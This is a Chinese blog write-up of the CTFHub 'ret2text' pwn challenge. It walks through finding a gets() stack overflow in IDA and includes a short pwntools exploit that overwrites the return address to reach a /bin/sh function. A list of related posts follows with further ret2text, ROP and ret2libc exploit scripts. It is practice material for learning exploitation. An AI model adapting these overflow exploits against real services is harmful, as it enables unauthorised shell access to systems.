CTFHUB(PWN)Ret2Text

最新推荐文章于 2024-08-01 19:15:28 发布
最新推荐文章于 2024-08-01 19:15:28 发布
阅读量4.3k 收藏 1
点赞数 3
文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/122772158
版权
本文探讨了在64位程序中发现的栈溢出漏洞,通过IDA64分析发现gets函数不设长度限制。作者详细介绍了如何定位bin_sh函数地址,构造payload并使用pwn库进行远程攻击,最后演示了交互式shell获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先检查保护机制 checksec

64 位 + 什么保护都没开

然后放到ida64中查看

发现gets函数,没有限制数据的长度,容易发生栈溢出

shift+F12 找到bin_sh函数地址

64位程序直接读取偏移量

构造payload,编写exp

from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive

连接成功后ls

cat flag

Rt1Text
关注
ret2text
Power_shell的博客
03-25 510
Shellcode可以放到bss段然后去执行我们的shell可以控制好几段位置不相邻的代码(gadgets),用rop技术 随着nx保护技术的开启,往堆栈写代码的方式已经发挥不了效果 Rop:Return-oriented Programming(面向返回的编程) 在缓冲区溢出的基础上利用程序已有的小片段,来改变我们程序寄存器变量的值,从而达到控制程序执行流程的效果 所以gadgets是以ret...
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1343
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
PWN · ret2text】——[CTFHub]ret2text
Mr_Fmnwon的博客
04-20 3411
经典的ret2text流程。
[CTFHub] ret2text
Lucien_Carr的博客
04-14 900
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。输入超过程序设定的字节数以后,就会发生栈溢出,多出的内容会覆盖返回地址。这个题目中要获得系统的shell,只需要先用垃圾数据填充填满数组的空间,再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8(“/bin/sh”指令的地址),就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权(也就是拿到shell)。
CTFhub-pwn-[ret2text]-writeup
m0_43405474的博客
08-26 1921
关于CTF pwn的简单入门题目,ret2text
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1250
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 2015
CTFHub 栈溢出 ret2text exp代码
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 926
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
[CTFHub]ret2text-入土为安的第十二天
lzx13290757580的博客
08-01 253
ida fn+ F5 main 点(_int64)v4。v大小为0x70+栈基指针0x8+返回地址。
CTFHUB-PWN-ret2text
m0_64180167的博客
04-16 192
然后我们可以开始写payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。
pwn ret2text
小龙在线
09-12 754
首先把ret2text用IDA打开: 64位ELF文件。 进入main函数,F5反编译,双击vulnerable函数,进入: 发现溢出点。 函数窗口列表,查看success,发现shell: 进入IDA普通视图,双击左侧success函数,查看success地址,是400566。 写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.
CTFhub pwn
清霂的博客
02-04 1424
这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞,题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口,找到/bin/sh 点进去,选中/bin/sh,右键,交叉引用列表(可以找到使用/bin/sh的地方) 看到把/bin/sh放入rdi后,调用了system x64,64位系统中rdi,rsi,rdx,rcx,r8,r9作为调用函数的前6个参数,如果参数多于6
ctfhub pwn
m0_63253040的博客
09-09 348
被ida演了一波,gets不给参数,**********************给了system('/bin/sh')位置是0x4007B8。后来重新打开一遍就有了。
CTFpwn:ret2text,mprotece,shellcode,自动化rop链
2302_79813730的博客
01-25 1099
text:0000000000401324 75 EA jnz short loc_401310 #对比rbp里的值与rbx里的值,如果相同就继续运行程序,如果不同就返回0x401310。先将栈溢出的返回地址填成0x40132A,将需要的数据依次填入栈顶,依次弹入寄存器中,随后在执行到0x401334,retn返回的时候将返回地址填成0x401310,这样,我们就可以控制edi,rsi,rdx里的值,并调用write函数泄露基址。
CTFHub pwn [FastBin Attack]
saulgoodman的博客
01-29 577
【代码】CTFHub pwn [FastBin Attack]
CTF--PWN--作业记录之02-ret2text(仅做个人课程学习作业记录,可能对各位帮助不大)
weixin_43594719的博客
10-15 489
【步骤一】打开XShell后,查看目录,使用cp命令将实验素材拷贝到当前目录中。 【步骤二】使用ls -al命令查看02-second文件夹的权限,没有问题。 【步骤三】切换到02-second的目录下,查看其中的文件的权限,发现文件second的我们没有执行权限。 【步骤四】使用命令chmod +x second给second加上执行权限 【步骤五】使用命令cat second.c查看源代码,分析一下发现此代码在正常情况下永远执行不到haha(),但在haha()中有我们想要执行的语句system
CTF pwn方向 ret2text 总结和例题
qq_20242529的博客
05-21 750
这里用命令:ROPgadget --binary filename --only "pop|ret"这里有system(“/bin/sh”),要将主函数跳带这里就能拿shell。padding=0X9+4 这里的4是因为32位。找system函数。以Polar靶场的小狗汪汪汪为例子。因为是64所以要找rdi的地址。复制getshell的地址。以Polar靶场的x64为例。找bin/sh.或者$0等。这里有危险函数gets。
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1750
CTF中pwn的一个关于ret2shellcode的小练习,来自CTFhub
ctf wiki pwn ret2libc
最新发布
03-01
### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术,在这种技术下,攻击者通过覆盖返回地址来调用系统中的现有函数(通常是`system()`),从而执行任意命令。当面对静态链接的二进制文件时,由于其缺少GOT/PLT表,“xxx is statically linked, skipping GOT/PLT symbols”的提示表明无法从这些地方获取库函数地址[^1]。 对于动态链接的目标而言,可以通过操纵堆栈指针指向目标函数的实际位置实现ret2libc攻击;而对于静态编译的情况,则可以直接在`.text`段内寻找所需的函数入口点并加以利用。 下面是一个简单的Python脚本用于演示如何实施ret2libc攻击: ```python from pwn import * # 设置远程连接参数 host = 'example.com' port = 9999 # 连接到服务端 conn = remote(host, port) # 假设已知偏移量为offset=108字节,并且存在可以控制的数据位于该处之后 offset = 108 # 获取/bin/sh字符串的位置以及system()函数的真实地址 bin_sh_addr = 0xdeadbeef # 需要替换为实际地址 system_addr = 0xbadc0de # 同上 payload = b'A' * offset + pack(system_addr) + b'JUNK' + pack(bin_sh_addr) # 发送载荷给服务器 conn.sendline(payload) # 切换到交互模式以便观察后续操作结果 conn.interactive() ``` 此代码片段展示了发送精心构造的有效负载至易受攻击的服务的过程,其中包含了必要的填充字符、system()函数地址及其参数"/bin/sh"所在内存区域的指针值。需要注意的是上述示例中使用的具体数值应当依据实际情况调整。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值